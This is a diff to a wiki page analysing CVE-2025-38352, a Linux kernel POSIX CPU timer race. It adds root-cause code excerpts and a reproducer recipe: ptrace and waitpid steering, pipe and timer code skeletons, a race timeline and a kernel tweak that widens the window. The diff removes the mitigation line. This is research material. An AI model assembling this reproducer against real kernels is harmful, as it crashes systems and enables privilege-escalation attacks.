src/linux-hardening/privilege-escalation/linux-kernel-exploitation/posix-cpu-timers-toctou-cve-2025-38352.md
Lines changed: 123 additions & 4 deletions
@@ -80,6 +80,9 @@ Two expiry-processing modes
80
80
- CONFIG_POSIX_CPU_TIMERS_TASK_WORK=y: expiry is deferred via task_work on the target task
81
81
- CONFIG_POSIX_CPU_TIMERS_TASK_WORK=n: expiry handled directly in IRQ context
Root cause: TOCTOU between IRQ-time expiry and concurrent deletion under task exit
130
140
Preconditions
131
141
- CONFIG_POSIX_CPU_TIMERS_TASK_WORK is disabled (IRQ path in use)
@@ -139,6 +149,52 @@ Sequence
139
149
4) Immediately after unlock, the exiting task can be reaped; a sibling thread executes posix_cpu_timer_del().
140
150
5) In this window, posix_cpu_timer_del() may fail to acquire state via cpu_timer_task_rcu()/lock_task_sighand() and therefore skip the normal in-flight guard that checks timer->it.cpu.firing. Deletion then proceeds as if the timer were not firing and corrupts state while expiry is still being handled, leading to crashes or undefined behavior.
141
151
152
+
### How release_task() and timer_delete() free firing timers
153
+
Even after handle_posix_cpu_timers() has taken the timer off the task list, a ptraced zombie can still be reaped. The waitpid() stack drives release_task() → __exit_signal(), which tears down sighand and the signal queues while another CPU is still holding pointers to the timer object:
tsk->sighand = NULL; // makes future lock_task_sighand() fail
161
+
unlock_task_sighand(tsk, NULL);
162
+
}
163
+
```
164
+
165
+
With sighand detached, timer_delete() still returns success because posix_cpu_timer_del() leaves `ret = 0` when locking fails, so the syscall proceeds to free the object via RCU:
166
+
167
+
```c
168
+
static int posix_cpu_timer_del(struct k_itimer *timer)
Because the slab object is RCU-freed while IRQ context still walks the `firing` list, reuse of the timer cache becomes a UAF primitive.
188
+
189
+
### Steering reaping with ptrace + waitpid
190
+
The easiest way to keep a zombie around without it being auto-reaped is to ptrace a non-leader worker thread. exit_notify() first sets `exit_state = EXIT_ZOMBIE` and only transitions to EXIT_DEAD if `autoreap` is true. For ptraced threads, `autoreap` takes the return value of do_notify_parent(), which stays false as long as SIGCHLD is not ignored, so release_task() only runs when the parent explicitly calls waitpid():
191
+
192
+
- Use pthread_create() inside the tracee so the victim is not the thread-group leader (wait_task_zombie() handles ptraced non-leaders).
193
+
- Parent issues `ptrace(PTRACE_ATTACH, tid, NULL, NULL)` and later `waitpid(tid, &status, __WALL)` to drive do_wait_pid() → wait_task_zombie() → release_task().
194
+
- Pipes or shared memory convey the exact TID to the parent so the correct worker is reaped on demand.
195
+
196
+
This choreography guarantees a window where handle_posix_cpu_timers() can still reference `tsk->sighand`, while a subsequent waitpid() tears it down and allows timer_delete() to reclaim the same k_itimer object.
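The parent-side steering described in this section can be sketched as follows. This is a minimal illustration, not the original PoC: the helper names `wait_tid()`, `attach_and_resume()`, and `reap_tracee()` are hypothetical, and the sketch assumes the caller is permitted to ptrace the target (for example, the target is a descendant and Yama does not forbid it).

```c
#include <assert.h>
#include <errno.h>
#include <signal.h>
#include <stddef.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* waitpid() wrapper that retries on EINTR. __WALL makes the call match
 * clone()-created threads as well as ordinary children. */
static int wait_tid(pid_t tid, int *status)
{
    pid_t r;

    do {
        r = waitpid(tid, status, __WALL);
    } while (r == -1 && errno == EINTR);
    return r == tid ? 0 : -1;
}

/* Attach to the worker, consume the attach stop, then let it run on. */
int attach_and_resume(pid_t tid)
{
    int status = 0;

    assert(tid > 0);
    if (ptrace(PTRACE_ATTACH, tid, NULL, NULL) == -1)
        return -1;
    if (wait_tid(tid, &status) == -1 || !WIFSTOPPED(status))
        return -1;
    /* data == 0: resume without re-injecting the SIGSTOP from the attach. */
    if (ptrace(PTRACE_CONT, tid, NULL, NULL) == -1)
        return -1;
    return 0;
}

/* Reap the traced task on demand. For a zombie tracee this is the call
 * that ends in release_task() on the kernel side. */
int reap_tracee(pid_t tid, int *status)
{
    assert(tid > 0);
    return wait_tid(tid, status);
}
```

Because the tracee is never auto-reaped, the second call is entirely under the parent's control: `reap_tracee()` can be delayed until the parent decides the timer is in flight.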
197
+
142
198
Why TASK_WORK mode is safe by design
143
199
- With CONFIG_POSIX_CPU_TIMERS_TASK_WORK=y, expiry is deferred to task_work; exit_task_work runs before exit_notify, so the IRQ-time overlap with reaping does not occur.
144
200
- Even then, if the task is already exiting, task_work_add() fails; gating on exit_state makes both modes consistent.
@@ -159,7 +215,18 @@ Impact
159
215
160
216
Triggering the bug (safe, reproducible conditions)
161
217
Build/config
162
-
- Ensure CONFIG_POSIX_CPU_TIMERS_TASK_WORK=n and use a kernel without the exit_state gating fix.
218
+
- Ensure CONFIG_POSIX_CPU_TIMERS_TASK_WORK=n and use a kernel without the exit_state gating fix. On x86/arm64 the option is normally forced on via HAVE_POSIX_CPU_TIMERS_TASK_WORK, so researchers often patch `kernel/time/Kconfig` to expose a manual toggle:
219
+
220
+
```kconfig
221
+
config POSIX_CPU_TIMERS_TASK_WORK
222
+
bool "CVE-2025-38352: POSIX CPU timers task_work toggle" if EXPERT
223
+
depends on POSIX_TIMERS && HAVE_POSIX_CPU_TIMERS_TASK_WORK
224
+
default y
225
+
```
226
+
227
+
This mirrors what Android vendors did for analysis builds; upstream x86_64 and arm64 force HAVE_POSIX_CPU_TIMERS_TASK_WORK=y, so the vulnerable IRQ path mainly exists on 32-bit Android kernels where the option is compiled out.
228
+
229
+
- Run on a multi-core VM (e.g., QEMU `-smp cores=4`) so parent, child main, and worker threads can stay pinned to dedicated CPUs.
163
230
164
231
Runtime strategy
165
232
- Target a thread that is about to exit and attach a CPU timer to it (per-thread or process-wide clock):
@@ -191,9 +258,58 @@ void *deleter(void *arg) {
191
258
192
259
- Race amplifiers: high scheduler tick rate, CPU load, repeated thread exit/re-create cycles. The crash typically manifests when posix_cpu_timer_del() skips noticing firing due to failing task lookup/locking right after unlock_task_sighand().
193
260
194
-
Detection and hardening
195
-
- Mitigation: apply the exit_state guard; prefer enabling CONFIG_POSIX_CPU_TIMERS_TASK_WORK when feasible.
196
-
- Observability: add tracepoints/WARN_ONCE around unlock_task_sighand()/posix_cpu_timer_del(); alert when it.cpu.firing==1 is observed together with failed cpu_timer_task_rcu()/lock_task_sighand(); watch for timerqueue inconsistencies around task exit.
261
+
### Practical PoC orchestration
262
+
#### Thread & IPC choreography
263
+
A reliable reproducer forks into a ptracing parent and a child that spawns the vulnerable worker thread. Two pipes (`c2p`, `p2c`) deliver the worker TID and gate each phase, while a `pthread_barrier_t` prevents the worker from arming its timer until the parent has attached. Each process or thread is pinned with `sched_setaffinity()` (e.g., parent on CPU1, child main on CPU0, worker on CPU2) to minimize scheduler noise and keep the race reproducible.
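The TID handoff over the `c2p` pipe might look like the sketch below. The helper names `send_tid()` and `recv_tid()` are illustrative assumptions rather than names from the original reproducer. The only point is that both sides loop until the full `pid_t` has been transferred, so the parent never acts on a partial value.

```c
#include <assert.h>
#include <errno.h>
#include <sys/types.h>
#include <unistd.h>

/* Write the worker TID to the pipe, retrying on EINTR and short writes. */
int send_tid(int fd, pid_t tid)
{
    const char *p = (const char *)&tid;
    size_t left = sizeof(tid);

    assert(tid > 0);
    while (left > 0) {
        ssize_t n = write(fd, p, left);
        if (n == -1) {
            if (errno == EINTR)
                continue;
            return -1;
        }
        p += n;
        left -= (size_t)n;
    }
    return 0;
}

/* Read exactly one pid_t from the pipe; fails if the writer closes early. */
int recv_tid(int fd, pid_t *tid)
{
    char *p = (char *)tid;
    size_t left = sizeof(*tid);

    assert(tid != NULL);
    while (left > 0) {
        ssize_t n = read(fd, p, left);
        if (n == 0)
            return -1; /* EOF before a full TID arrived */
        if (n == -1) {
            if (errno == EINTR)
                continue;
            return -1;
        }
        p += n;
        left -= (size_t)n;
    }
    return 0;
}
```

In such a setup the worker would typically obtain its own TID with `syscall(SYS_gettid)` and pass it to `send_tid()` on the write end of `c2p`. A single byte written to `p2c` is enough to gate the later phases.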
264
+
265
+
#### Timer calibration with CLOCK_THREAD_CPUTIME_ID
266
+
The worker arms a per-thread CPU timer so that only its own CPU consumption advances the deadline. A tunable `wait_time` (default ≈250 µs of CPU time) plus a bounded busy loop ensure that `exit_notify()` sets `EXIT_ZOMBIE` while the timer is just about to fire:
267
+
268
+
<details>
269
+
<summary>Minimal per-thread CPU timer skeleton</summary>
270
+
271
+
```c
272
+
static timer_t timer;
273
+
static long wait_time = 250000; // nanoseconds of CPU time
pthread_barrier_wait(&barrier); // released by child main after ptrace attach
291
+
timer_settime(timer, 0, &ts, NULL);
292
+
293
+
for (volatile int i = 0; i < 1000000; i++); // burn CPU before exiting
294
+
return NULL; // do_exit() keeps burning CPU
295
+
}
296
+
```
297
+
298
+
</details>
299
+
300
+
#### Race timeline
301
+
1. Child tells the parent the worker TID via `c2p`, then blocks on the barrier.
302
+
2. Parent attaches with `PTRACE_ATTACH`, waits for the attach stop in `waitpid(tid, &status, __WALL)`, then issues `PTRACE_CONT` to let the worker run and exit.
303
+
3. When heuristics (or manual operator input) suggest the timer was collected into the IRQ-side `firing` list, the parent executes `waitpid(tid, &status, __WALL)` again to trigger release_task() and drop `tsk->sighand`.
304
+
4. Parent signals the child over `p2c` so child main can call `timer_delete(timer)` and immediately run a helper such as `wait_for_rcu()` until the timer’s RCU callback completes.
305
+
5. IRQ context eventually resumes `handle_posix_cpu_timers()` and dereferences the freed `struct k_itimer`, tripping KASAN or WARN_ON()s.
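The timeline only names a `wait_for_rcu()` helper and does not show its body. One possible userspace approximation, offered purely as an assumption, is to issue `membarrier(MEMBARRIER_CMD_GLOBAL)`, which on multi-CPU systems waits for an RCU grace period inside the kernel. The function name `wait_for_rcu_sketch()` and the `rounds` parameter are hypothetical. A completed grace period makes it likely, but does not strictly prove, that the timer's RCU callback has already run.

```c
#include <assert.h>
#include <linux/membarrier.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Assumption: approximate "wait for RCU" by forcing `rounds` grace periods
 * through membarrier(2). Returns 0 on success, -1 (errno set) on failure,
 * e.g. if the syscall is unavailable or filtered. */
int wait_for_rcu_sketch(int rounds)
{
    assert(rounds > 0);
    for (int i = 0; i < rounds; i++) {
        /* glibc has no membarrier() wrapper, so use the raw syscall. */
        if (syscall(SYS_membarrier, (long)MEMBARRIER_CMD_GLOBAL, 0L, 0L) == -1)
            return -1;
    }
    return 0;
}
```

Calling it with more than one round right after `timer_delete(timer)` trades a little latency for a better chance that the deferred free has completed before the IRQ path resumes.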
306
+
307
+
#### Optional kernel instrumentation
308
+
For research setups, injecting a debug-only `mdelay(500)` inside handle_posix_cpu_timers() when the task name matches (e.g., `strcmp(tsk->comm, "SLOWME") == 0`) widens the window so the above choreography almost always wins the race. The same PoC also renames threads (`prctl(PR_SET_NAME, ...)`) so kernel logs and breakpoints confirm the expected worker is being reaped.
309
+
310
+
### Instrumentation cues during exploitation
311
+
- Add tracepoints/WARN_ONCE around unlock_task_sighand()/posix_cpu_timer_del() to spot cases where `it.cpu.firing==1` coincides with failed cpu_timer_task_rcu()/lock_task_sighand(); monitor timerqueue consistency when the victim exits.
312
+
- KASAN typically reports `slab-use-after-free` inside posix_timer_queue_signal(), while non-KASAN kernels log WARN_ON_ONCE() from send_sigqueue() when the race lands, giving a quick success indicator.